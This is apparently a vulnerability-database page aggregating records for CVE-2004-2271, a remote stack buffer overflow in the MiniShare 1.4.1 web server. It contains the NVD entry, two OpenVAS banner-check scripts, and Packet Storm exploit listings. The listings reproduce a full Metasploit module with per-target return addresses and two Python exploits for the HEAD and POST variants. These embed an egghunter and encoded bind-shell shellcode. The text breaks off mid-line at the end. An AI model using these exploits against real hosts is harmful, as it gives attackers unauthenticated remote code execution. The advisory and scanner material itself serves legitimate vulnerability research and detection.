ID CVE-2004-2271
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:31:00
Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request. The advisories and scanner checks collected below describe this as a plain stack overflow in the request path, reachable by an unauthenticated remote client (CVSS Au:N), with releases 1.3.4 and below reported as not affected and MiniShare 1.4.2 as the vendor fix; later reports (CVE-2018-19861, CVE-2018-19862) note that the same overflow is also reachable through HEAD and POST requests and that the product is deprecated, so replacing MiniShare rather than upgrading it is the practical remediation.
{"id": "CVE-2004-2271", "bulletinFamily": "NVD", "title": "CVE-2004-2271", "description": "Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.", "published": "2004-12-31T05:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2271", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/13114", "http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/17978", "http://sourceforge.net/project/shownotes.php?release_id=241158", "http://www.securiteam.com/exploits/6X00B1PBPC.html", "http://www.osvdb.org/11530", "http://www.securityfocus.com/bid/11620", "http://securitytracker.com/id?1012106"], "cvelist": ["CVE-2004-2271"], "type": "cve", "lastseen": "2021-02-02T05:23:01", "edition": 6, "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:136141256231018424", "OPENVAS:18424"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150689", "PACKETSTORM:82959"]}, {"type": "osvdb", "idList": ["OSVDB:11530"]}, {"type": "exploitdb", "idList": ["EDB-ID:616", "EDB-ID:16754", "EDB-ID:636"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MINISHARE_GET_OVERFLOW"]}, {"type": "nessus", "idList": ["MINISHARE_OVERFLOW.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-31748"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:64B73DAC0A0638D9032B0D40ABD6337C"]}], "modified": "2021-02-02T05:23:01", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2021-02-02T05:23:01", "rev": 2}, "vulnersScore": 8.2}, "cpe": ["cpe:/a:minishare:minimal_http_server:1.4.1"], "affectedSoftware": [{"cpeName": "minishare:minimal_http_server", "name": "minishare minimal http server", "operator": "le", "version": "1.4.1"}], "cvss2": {"cvssV2": 
{"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": true, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:minishare:minimal_http_server:1.4.1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:minishare:minimal_http_server:1.4.1:*:*:*:*:*:*:*", "versionEndIncluding": "1.4.1", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "13114", "refsource": "SECUNIA", "tags": ["Patch", "Vendor Advisory"], "url": "http://secunia.com/advisories/13114"}, {"name": "20041107 [New VULNERABILTY + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit", "refsource": "FULLDISC", "tags": ["Vendor Advisory"], "url": "http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html"}, {"name": "http://sourceforge.net/project/shownotes.php?release_id=241158", "refsource": "CONFIRM", "tags": ["Patch"], "url": "http://sourceforge.net/project/shownotes.php?release_id=241158"}, {"name": "1012106", "refsource": "SECTRACK", "tags": ["Exploit"], "url": "http://securitytracker.com/id?1012106"}, {"name": "11620", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/11620"}, {"name": "minishare-address-link-bo(17978)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17978"}, {"name": "http://www.securiteam.com/exploits/6X00B1PBPC.html", "refsource": "MISC", "tags": ["Exploit"], "url": "http://www.securiteam.com/exploits/6X00B1PBPC.html"}, {"name": "11530", "refsource": "OSVDB", "tags": 
["Patch"], "url": "http://www.osvdb.org/11530"}]}
{"openvas": [{"lastseen": "2020-05-08T08:39:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.", "modified": "2020-05-05T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231018424", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231018424", "type": "openvas", "title": "MiniShare webserver buffer overflow", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# MiniShare webserver buffer overflow\n#\n# Authors:\n# Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n# Changes by Tenable Network Security :\n# * detect title to prevent false positives\n# * fix version detection\n# * added CVE and OSVDB xrefs.\n#\n# Copyright:\n# Copyright (C) 2005 SensePost\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.18424\");\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id(11620);\n script_xref(name:\"OSVDB\", value:\"11530\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"MiniShare webserver buffer overflow\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2005 SensePost\");\n script_family(\"Gain a shell remotely\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"summary\", value:\"MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\");\n\n script_tag(name:\"impact\", value:\"A remote attacker could execute arbitrary commands by sending a specially\n crafted file name in a the GET request.\");\n\n script_tag(name:\"affected\", value:\"Version 1.3.4 and below do not seem to be vulnerable.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MiniShare 1.4.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nres = 
http_get_cache( item:\"/\", port:port );\nif(!res || \"<title>MiniShare</title>\" >!< res)\n exit( 0 );\n\nif( egrep( string:res, pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[01][^0-9])' ) ) {\n security_message( port:port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-08T11:44:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2271"], "description": "MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\nA remote attacker could execute arbitrary commands by sending a specially\ncrafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:18424", "href": "http://plugins.openvas.org/nasl.php?oid=18424", "type": "openvas", "title": "MiniShare webserver buffer overflow", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: minishare_overflow.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: MiniShare webserver buffer overflow\n#\n# Authors:\n# Gareth Phillips - SensePost PTY ltd (www.sensepost.com)\n# Changes by Tenable Network Security :\n# * detect title to prevent false positives\n# * fix version detection\n# * added CVE and OSVDB xrefs.\n#\n# Copyright:\n# Copyright (C) 2005 SensePost\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"MiniShare 1.4.1 and prior versions are affected by a buffer overflow flaw.\nA remote attacker could execute arbitrary commands by sending a specially\ncrafted file name in a the GET request.\n\nVersion 1.3.4 and below do not seem to be vulnerable.\";\n\ntag_solution = \"Upgrade to MiniShare 1.4.2 or higher.\";\n\nif(description)\n{\n script_id(18424);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_cve_id(\"CVE-2004-2271\");\n script_bugtraq_id (11620);\n script_xref(name:\"OSVDB\", value:\"11530\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n name = \"MiniShare webserver buffer overflow\";\n script_name(name);\n\n\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_copyright(\"This script is Copyright (C) 2005 SensePost\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# Code Starts Here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{\nres = http_get_cache(item:\"/\", port:port);\nif( res == NULL ) exit(0);\nif (\"<title>MiniShare</title>\" >!< res)\n exit (0);\n\nif (egrep (string:res, 
pattern:'<p class=\"versioninfo\"><a href=\"http://minishare\\\\.sourceforge\\\\.net/\">MiniShare 1\\\\.(3\\\\.([4-9][^0-9]|[0-9][0-9])|4\\\\.[0-1][^0-9])'))\n security_message (port);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:06", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Minishare 1.4.1 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2271"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:82959", "href": "https://packetstormsecurity.com/files/82959/Minishare-1.4.1-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Minishare 1.4.1 Buffer Overflow', \n'Description' => %q{ \nThis is a simple buffer overflow for the minishare web \nserver. This flaw affects all versions prior to 1.4.2. This \nis a plain stack overflow that requires a \"jmp esp\" to reach \nthe payload, making this difficult to target many platforms \nat once. This module has been successfully tested against \n1.4.1. Version 1.3.4 and below do not seem to be vulnerable. 
\n \n}, \n'Author' => [ 'acaro <acaro@jervus.it>' ], \n'License' => BSD_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-2271'], \n[ 'OSVDB', '11530'], \n[ 'BID', '11620'], \n[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html'], \n \n], \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\\x40\", \n'MinNops' => 64, \n'StackAdjustment' => -3500, \n \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['Windows 2000 SP0-SP3 English', { 'Rets' => [ 1787, 0x7754a3ab ]}], # jmp esp \n['Windows 2000 SP4 English', { 'Rets' => [ 1787, 0x7517f163 ]}], # jmp esp \n['Windows XP SP0-SP1 English', { 'Rets' => [ 1787, 0x71ab1d54 ]}], # push esp, ret \n['Windows XP SP2 English', { 'Rets' => [ 1787, 0x71ab9372 ]}], # push esp, ret \n['Windows 2003 SP0 English', { 'Rets' => [ 1787, 0x71c03c4d ]}], # push esp, ret \n['Windows NT 4.0 SP6', { 'Rets' => [ 1787, 0x77f329f8 ]}], # jmp esp \n['Windows XP SP2 German', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp \n['Windows XP SP2 Polish', { 'Rets' => [ 1787, 0x77d4e26e ]}], # jmp esp \n['Windows XP SP2 French', { 'Rets' => [ 1787, 0x77d5af0a ]}], # jmp esp \n], \n'DisclosureDate' => 'Nov 7 2004')) \nend \n \ndef exploit \nuri = rand_text_alphanumeric(target['Rets'][0]) \nuri << [target['Rets'][1]].pack('V') \nuri << payload.encoded \n \nprint_status(\"Trying target address 0x%.8x...\" % target['Rets'][1]) \nsend_request_raw({ \n'uri' => uri \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82959/minishare_get_overflow.rb.txt"}, {"lastseen": "2018-12-08T02:36:14", "description": "", "published": "2018-12-07T00:00:00", "type": "packetstorm", "title": "MiniShare 1.4.1 HEAD / POST Buffer Overflow", "bulletinFamily": "exploit", "cvelist": 
["CVE-2018-19862", "CVE-2018-19861", "CVE-2004-2271"], "modified": "2018-12-07T00:00:00", "id": "PACKETSTORM:150689", "href": "https://packetstormsecurity.com/files/150689/MiniShare-1.4.1-HEAD-POST-Buffer-Overflow.html", "sourceData": "`Hi!!! playing in 2006.... I have adapted the exploit to python \n \nNot only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST \nmethods are also vulnerable. The difference is minimal, both are exploited \nin the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length \n \n------------------------------------------------------------------- \n \nEAX 00000000 \nECX 77C3EF3B msvcrt.77C3EF3B \nEDX 00F14E38 \nEBX 43346843 \nESP 01563908 ASCII \n\"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co \nHTTP/1.1 \n\" \nEBP 0156BB90 \nESI 00000001 \nEDI 01565B68 \nEIP 68433568 \nC 0 ES 0023 32bit 0(FFFFFFFF) \nP 1 CS 001B 32bit 0(FFFFFFFF) \nA 1 SS 0023 32bit 0(FFFFFFFF) \nZ 0 DS 0023 32bit 0(FFFFFFFF) \nS 0 FS 003B 32bit 7FFDD000(FFF) \nT 0 GS 0000 NULL \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00010216 (NO,NB,NE,A,NS,PE,GE,G) \nST0 empty \nST1 empty \nST2 empty \nST3 empty \nST4 empty \nST5 empty \nST6 empty \nST7 empty \n3 2 1 0 E S P U O Z D I \nFST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n------------------------------------------------------------------------------ \n \nOnly 210 bytes to shellcode \n \n------------------------------------------------------------------------------ \n \nBadchars '00','0d' \n \n------------------------------------------------------------------------------ \n \n>findjmp kernel32.dll esp - XP SP 3 English \n \nScanning kernel32.dll for code useable with the esp register \n0x7C809F83 call esp \n0x7C8369E0 call esp \n0x7C83C2C5 push esp - ret \n0x7C87641B call esp \n \n 
\n<!-- \n# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method. \n# Date: 05-12-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://minishare.sourceforge.net/ \n# Software Link: http://minishare.sourceforge.net/ \n# Version: Minishare v1.4.1 \n# Tested on: Windows \n# CVE : CVE-2018-19861 \n# Category: exploit \n \n1. Description \n \nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP HEAD request. \n \n \n2. Proof of Concept \n \nExploit: \n \n#!/usr/bin/env python \nimport socket \nimport struct \nimport os \n \n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP HEAD request - by Rafa \n# CVE: CVE-2018-19861 \n# Via Egghunter because shellcode in ESP only 210 bytes long. \n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/ \nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nhost = \"127.0.0.1\" \nport = 80 \n \n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34 \negghunter = \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f \npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c \n#Found 10 compatible encoders \n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai \n#x86/shikata_ga_nai succeeded with size 355 (iteration=0) \n#x86/shikata_ga_nai chosen with final size 355 \n#Payload size: 355 bytes \n#Final size of c file: 1516 bytes \n#unsigned char buf[] = \nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\" \n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\" \n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\" 
\n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\" \n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\" \n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\" \n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\" \n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\" \n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\" \n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\" \n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\" \n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\" \n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\" \n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\" \n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\" \n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\" \n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\" \n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\" \n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\" \n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\" \n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\" \n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\" \n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\" \n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\") \n \n# findjmp kernel32.dll esp - WinXP SP3 English \n#0x7C809F83 call esp \n \nnops = \"\\x90\" * 16 \n \njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 - \n1786 - 4 - 16 - len(egghunter)) \n \ntry: \nprint \"Sending exploit...\" \nconnection.connect((host,port)) 
\nbuffer = ( \n\"HEAD \" + junk + \" HTTP/1.1\\r\\n\" \n\"Host: \" + shellcode + \"\\r\\n\\r\\n\") \n \nconnection.send(buffer) \nconnection.close() \nprint \"\\nExploit Sended \", len(buffer) \nexcept: \nprint \"Connection error\" \n \n \n \n3. Solution: \n \nThis product is deprecated \n \n--> \n \n \n<!-- \n# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method. \n# Date: 05-12-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://minishare.sourceforge.net/ \n# Software Link: http://minishare.sourceforge.net/ \n# Version: Minishare v1.4.1 \n# Tested on: Windows \n# CVE : CVE-2018-19862 \n# Category: exploit \n \n1. Description \n \nBuffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP POST request. \n \n \n2. Proof of Concept \n \nExploit: \n \n#!/usr/bin/env python \nimport socket \nimport struct \nimport os \n \n# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to \nexecute arbitrary code via a long HTTP POST request - by Rafa \n# CVE: CVE-2018-19862 \n# Via Egghunter because shellcode in ESP only 210 bytes long. 
\n# Project Home Page (MiniShare) - http://minishare.sourceforge.net/ \nconnection=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nhost = \"127.0.0.1\" \nport = 80 \n \n# 32 bytes Egghunter - Egg = r4f4 = \\x72\\x34\\x66\\x34 \negghunter = \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x72\\x34\\x66\\x34\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \n#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f \npython -a x86 --platform windows -b \"\\x00\\x0d\" -f c \n#Found 10 compatible encoders \n#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai \n#x86/shikata_ga_nai succeeded with size 355 (iteration=0) \n#x86/shikata_ga_nai chosen with final size 355 \n#Payload size: 355 bytes \n#Final size of c file: 1516 bytes \n#unsigned char buf[] = \nshellcode=(\"r4f4r4f4\"+\"\\xda\\xd4\\xb8\\xda\\xe7\\x1b\\xca\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\" \n\"\\x53\\x83\\xea\\xfc\\x31\\x42\\x13\\x03\\x98\\xf4\\xf9\\x3f\\xe0\\x13\\x7f\" \n\"\\xbf\\x18\\xe4\\xe0\\x49\\xfd\\xd5\\x20\\x2d\\x76\\x45\\x91\\x25\\xda\\x6a\" \n\"\\x5a\\x6b\\xce\\xf9\\x2e\\xa4\\xe1\\x4a\\x84\\x92\\xcc\\x4b\\xb5\\xe7\\x4f\" \n\"\\xc8\\xc4\\x3b\\xaf\\xf1\\x06\\x4e\\xae\\x36\\x7a\\xa3\\xe2\\xef\\xf0\\x16\" \n\"\\x12\\x9b\\x4d\\xab\\x99\\xd7\\x40\\xab\\x7e\\xaf\\x63\\x9a\\xd1\\xbb\\x3d\" \n\"\\x3c\\xd0\\x68\\x36\\x75\\xca\\x6d\\x73\\xcf\\x61\\x45\\x0f\\xce\\xa3\\x97\" \n\"\\xf0\\x7d\\x8a\\x17\\x03\\x7f\\xcb\\x90\\xfc\\x0a\\x25\\xe3\\x81\\x0c\\xf2\" \n\"\\x99\\x5d\\x98\\xe0\\x3a\\x15\\x3a\\xcc\\xbb\\xfa\\xdd\\x87\\xb0\\xb7\\xaa\" \n\"\\xcf\\xd4\\x46\\x7e\\x64\\xe0\\xc3\\x81\\xaa\\x60\\x97\\xa5\\x6e\\x28\\x43\" \n\"\\xc7\\x37\\x94\\x22\\xf8\\x27\\x77\\x9a\\x5c\\x2c\\x9a\\xcf\\xec\\x6f\\xf3\" \n\"\\x3c\\xdd\\x8f\\x03\\x2b\\x56\\xfc\\x31\\xf4\\xcc\\x6a\\x7a\\x7d\\xcb\\x6d\" \n\"\\x7d\\x54\\xab\\xe1\\x80\\x57\\xcc\\x28\\x47\\x03\\x9c\\x42\\x6e\\x2c\\x77\" 
\n\"\\x92\\x8f\\xf9\\xe2\\x9a\\x36\\x52\\x11\\x67\\x88\\x02\\x95\\xc7\\x61\\x49\" \n\"\\x1a\\x38\\x91\\x72\\xf0\\x51\\x3a\\x8f\\xfb\\x4c\\xe7\\x06\\x1d\\x04\\x07\" \n\"\\x4f\\xb5\\xb0\\xe5\\xb4\\x0e\\x27\\x15\\x9f\\x26\\xcf\\x5e\\xc9\\xf1\\xf0\" \n\"\\x5e\\xdf\\x55\\x66\\xd5\\x0c\\x62\\x97\\xea\\x18\\xc2\\xc0\\x7d\\xd6\\x83\" \n\"\\xa3\\x1c\\xe7\\x89\\x53\\xbc\\x7a\\x56\\xa3\\xcb\\x66\\xc1\\xf4\\x9c\\x59\" \n\"\\x18\\x90\\x30\\xc3\\xb2\\x86\\xc8\\x95\\xfd\\x02\\x17\\x66\\x03\\x8b\\xda\" \n\"\\xd2\\x27\\x9b\\x22\\xda\\x63\\xcf\\xfa\\x8d\\x3d\\xb9\\xbc\\x67\\x8c\\x13\" \n\"\\x17\\xdb\\x46\\xf3\\xee\\x17\\x59\\x85\\xee\\x7d\\x2f\\x69\\x5e\\x28\\x76\" \n\"\\x96\\x6f\\xbc\\x7e\\xef\\x8d\\x5c\\x80\\x3a\\x16\\x6c\\xcb\\x66\\x3f\\xe5\" \n\"\\x92\\xf3\\x7d\\x68\\x25\\x2e\\x41\\x95\\xa6\\xda\\x3a\\x62\\xb6\\xaf\\x3f\" \n\"\\x2e\\x70\\x5c\\x32\\x3f\\x15\\x62\\xe1\\x40\\x3c\") \n \n# findjmp kernel32.dll esp - WinXP SP3 English \n#0x7C809F83 call esp \n \nnops = \"\\x90\" * 16 \n \njunk = \"A\" * 1786 + \"\\x83\\x9f\\x80\\x7c\" + nops + egghunter + \"C\" * (2000 - \n1786 - 4 - 16 - len(egghunter)) \n \ntry: \nprint \"Sending exploit...\" \nconnection.connect((host,port)) \n \nbuffer = ( \n\"POST \" + junk + \" HTTP/1.1\\r\\n\" \n\"Host: \" + shellcode + \"\\r\\n\\r\\n\") \n \nconnection.send(buffer) \nconnection.close() \nprint 